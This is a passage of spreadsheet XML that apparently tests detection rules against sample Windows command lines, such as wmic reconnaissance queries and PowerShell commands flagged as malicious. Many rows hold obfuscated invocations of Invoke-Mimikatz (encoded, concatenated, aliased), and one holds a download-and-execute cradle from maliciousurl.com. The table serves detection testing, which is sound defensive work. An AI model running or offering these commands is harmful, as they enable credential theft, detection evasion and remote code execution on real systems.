      <c r="G753" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H753" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I753" s="44" t="n"/>
      <c r="J753" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K753" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="754" ht="15.75" customHeight="1" s="42">
      <c r="A754" s="44" t="n"/>
      <c r="B754" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_product_class</t>
        </is>
      </c>
      <c r="C754" s="44" t="inlineStr">
        <is>
          <t>Potential Product Class Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D754" s="44" t="inlineStr">
        <is>
          <t>e568650b-5dcd-4658-8f34-ded0b1e13992</t>
        </is>
      </c>
      <c r="E754" s="44" t="inlineStr">
        <is>
          <t>wmic.exe /"Namespace:\root\CIMV2" Path Win32_Process Get Name</t>
        </is>
      </c>
      <c r="F754" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G754" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H754" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I754" s="43" t="n"/>
      <c r="J754" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K754" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="755" ht="15.75" customHeight="1" s="42">
      <c r="A755" s="44" t="n"/>
      <c r="B755" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_product_class</t>
        </is>
      </c>
      <c r="C755" s="44" t="inlineStr">
        <is>
          <t>Potential Product Class Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D755" s="44" t="inlineStr">
        <is>
          <t>e568650b-5dcd-4658-8f34-ded0b1e13992</t>
        </is>
      </c>
      <c r="E755" s="44" t="inlineStr">
        <is>
          <t>wmic.exe -"Namespace:\root\CIMV2" Path Win32_Process Get Name</t>
        </is>
      </c>
      <c r="F755" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G755" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H755" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I755" s="43" t="n"/>
      <c r="J755" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K755" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="756" ht="15.75" customHeight="1" s="42">
      <c r="A756" s="44" t="n"/>
      <c r="B756" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_volume</t>
        </is>
      </c>
      <c r="C756" s="44" t="inlineStr">
        <is>
          <t>System Disk And Volume Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D756" s="44" t="inlineStr">
        <is>
          <t>c79da740-5030-45ec-a2e0-479e824a562c</t>
        </is>
      </c>
      <c r="E756" s="44" t="inlineStr">
        <is>
          <t>wmic.exe fsdir where "drive='C:'" get name,filesize</t>
        </is>
      </c>
      <c r="F756" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G756" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H756" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I756" s="43" t="n"/>
      <c r="J756" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K756" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="757" ht="15.75" customHeight="1" s="42">
      <c r="A757" s="44" t="n"/>
      <c r="B757" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_volume</t>
        </is>
      </c>
      <c r="C757" s="44" t="inlineStr">
        <is>
          <t>System Disk And Volume Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D757" s="44" t="inlineStr">
        <is>
          <t>c79da740-5030-45ec-a2e0-479e824a562c</t>
        </is>
      </c>
      <c r="E757" s="44" t="inlineStr">
        <is>
          <t>wmic.exe logicaldisk list brief</t>
        </is>
      </c>
      <c r="F757" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G757" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H757" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I757" s="43" t="n"/>
      <c r="J757" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K757" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="758" ht="15.75" customHeight="1" s="42">
      <c r="A758" s="44" t="n"/>
      <c r="B758" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_volume</t>
        </is>
      </c>
      <c r="C758" s="44" t="inlineStr">
        <is>
          <t>System Disk And Volume Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D758" s="44" t="inlineStr">
        <is>
          <t>c79da740-5030-45ec-a2e0-479e824a562c</t>
        </is>
      </c>
      <c r="E758" s="44" t="inlineStr">
        <is>
          <t>wmic.exe partition get name,size</t>
        </is>
      </c>
      <c r="F758" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G758" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H758" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I758" s="43" t="n"/>
      <c r="J758" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K758" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="759" ht="15.75" customHeight="1" s="42">
      <c r="A759" s="44" t="n"/>
      <c r="B759" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_volume</t>
        </is>
      </c>
      <c r="C759" s="44" t="inlineStr">
        <is>
          <t>System Disk And Volume Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D759" s="44" t="inlineStr">
        <is>
          <t>c79da740-5030-45ec-a2e0-479e824a562c</t>
        </is>
      </c>
      <c r="E759" s="44" t="inlineStr">
        <is>
          <t>wmic.exe logicaldisk where "DriveType=3" get Name,Size,FreeSpace</t>
        </is>
      </c>
      <c r="F759" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G759" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H759" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I759" s="44" t="n"/>
      <c r="J759" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K759" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="760" ht="15.75" customHeight="1" s="42">
      <c r="A760" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B760" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C760" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D760" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E760" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -cOMMAND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F760" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G760" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H760" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I760" s="44" t="n"/>
      <c r="J760" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K760" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="761" ht="15.75" customHeight="1" s="42">
      <c r="A761" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B761" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C761" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D761" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E761" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass /"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F761" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G761" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H761" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I761" s="44" t="n"/>
      <c r="J761" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K761" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="762" ht="15.75" customHeight="1" s="42">
      <c r="A762" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B762" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C762" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D762" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E762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762" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G762" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H762" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I762" s="43" t="n"/>
      <c r="J762" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K762" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="763" ht="15.75" customHeight="1" s="42">
      <c r="A763" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B763" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C763" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D763" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E763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763" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G763" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H763" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I763" s="43" t="n"/>
      <c r="J763" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K763" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="764" ht="15.75" customHeight="1" s="42">
      <c r="A764" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B764" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C764" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D764" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E764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764" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G764" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H764" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I764" s="44" t="n"/>
      <c r="J764" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K764" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="765" ht="15.75" customHeight="1" s="42">
      <c r="A765" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B765" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C765" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D765" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E765" s="4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765" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G765" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H765" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I765" s="43" t="n"/>
      <c r="J765" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K765" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="766" ht="15.75" customHeight="1" s="42">
      <c r="A766" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B766" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C766" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D766" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E766" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noproFiLE /"NonInteractive" -ep Bypass -CoMmaND "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F766" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G766" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H766" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I766" s="43" t="n"/>
      <c r="J766" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K766" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="767" ht="15.75" customHeight="1" s="42">
      <c r="A767" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B767" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C767" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D767" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E767" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F767" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G767" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H767" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I767" s="44" t="n"/>
      <c r="J767" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K767" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="768" ht="15.75" customHeight="1" s="42">
      <c r="A768" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B768" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C768" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D768" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E768" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ENcodEDCOMManD JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F768" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G768" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H768" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I768" s="43" t="n"/>
      <c r="J768" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K768" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="769" ht="15.75" customHeight="1" s="42">
      <c r="A769" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B769" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C769" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D769" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E769" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F769" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G769" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H769" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I769" s="44" t="n"/>
      <c r="J769" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K769" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="770" ht="15.75" customHeight="1" s="42">
      <c r="A770" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B770" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C770" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D770" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E770" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F770" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G770" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H770" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I770" s="44" t="n"/>
      <c r="J770" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K770" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="771" ht="15.75" customHeight="1" s="42">
      <c r="A771" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B771" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C771" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D771" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E771" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F771" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G771" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H771" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I771" s="44" t="n"/>
      <c r="J771" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K771" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="772" ht="15.75" customHeight="1" s="42">
      <c r="A772" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B772" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C772" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D772" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E772" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F772" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G772" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H772" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I772" s="44" t="n"/>
      <c r="J772" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K772" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="773" ht="15.75" customHeight="1" s="42">
      <c r="A773" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B773" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C773" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D773" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E773" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F773" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G773" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H773" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I773" s="44" t="n"/>
      <c r="J773" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K773" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="774" ht="15.75" customHeight="1" s="42">
      <c r="A774" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B774" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C774" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D774" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E774" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F774" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G774" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H774" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I774" s="44" t="n"/>
      <c r="J774" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K774" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="775" ht="15.75" customHeight="1" s="42">
      <c r="A775" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B775" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C775" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D775" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E775" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enc SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F775" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G775" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H775" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I775" s="43" t="n"/>
      <c r="J775" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K775" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="776" ht="15.75" customHeight="1" s="42">
      <c r="A776" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B776" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C776" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D776" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E776" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F776" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G776" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H776" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I776" s="44" t="n"/>
      <c r="J776" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K776" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="777" ht="15.75" customHeight="1" s="42">
      <c r="A777" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B777" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C777" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D777" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E777" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodeDcommANd SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F777" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G777" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H777" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I777" s="43" t="n"/>
      <c r="J777" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K777" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="778" ht="15.75" customHeight="1" s="42">
      <c r="A778" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B778" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C778" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D778" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E778" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eNcoDedcoMmAND SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F778" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G778" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H778" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I778" s="43" t="n"/>
      <c r="J778" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K778" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="779" ht="15.75" customHeight="1" s="42">
      <c r="A779" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B779" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C779" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D779" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E779" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F779" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G779" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H779" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I779" s="43" t="n"/>
      <c r="J779" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K779" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="780" ht="15.75" customHeight="1" s="42">
      <c r="A780" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B780" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C780" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D780" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E780" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F780" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G780" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H780" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I780" s="44" t="n"/>
      <c r="J780" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K780" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="781" ht="15.75" customHeight="1" s="42">
      <c r="A781" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B781" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C781" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D781" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E781" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F781" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G781" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H781" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I781" s="43" t="n"/>
      <c r="J781" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K781" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="782" ht="15.75" customHeight="1" s="42">
      <c r="A782" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B782" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C782" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D782" s="44" t="inlineStr">
        <is>
